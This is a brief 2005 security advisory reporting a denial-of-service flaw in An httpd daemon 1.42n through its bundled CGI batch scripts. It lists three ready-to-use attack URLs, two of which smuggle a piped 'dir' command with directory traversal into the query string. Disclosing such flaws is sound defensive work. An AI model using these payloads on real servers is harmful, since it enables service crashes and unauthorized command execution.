An httpd daemon 1.42n denial of service and privilege escalation

2 may 2005


Description:
Some vulnerabilities have been identified in An http daemon 1.42n that may allow a remote malicious 
user to perform some denial of service attacks


issue 1: The first vulnerability is a denial of servcice attack that can be used to crash An http daemon.
The server comes with a number of scripts but these scripts can be used for dos.
The url below will crash the server:
http://[host]/cgi-bin/test.bat?
http://[host]/cgi-bin/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
http://[host]//cgi-bin/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\



Credit:
Dr_insane
dr_insane(at)pathfinder.gr